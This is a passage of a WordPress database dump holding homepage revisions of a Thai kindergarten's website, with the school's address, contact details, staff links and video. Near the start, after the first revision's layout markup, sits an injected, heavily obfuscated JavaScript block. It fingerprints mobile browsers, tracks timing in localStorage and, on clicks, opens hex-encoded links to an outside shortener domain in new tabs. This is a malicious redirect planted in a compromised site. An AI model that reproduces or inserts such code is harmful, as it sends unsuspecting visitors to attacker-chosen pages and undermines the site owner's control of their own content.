-->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-28 09:47:58','2024-08-28 02:47:58','',19,'http://watprato.ssk.in.th/?p=238',0,'revision','',0),
(239,2,'2024-08-28 09:51:40','2024-08-28 02:51:40','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1u06_5GP1uT_R9axW6_ASul5adIiVXpDR/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1u06_5GP1uT_R9axW6_ASul5adIiVXpDR/view?usp=sharing\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 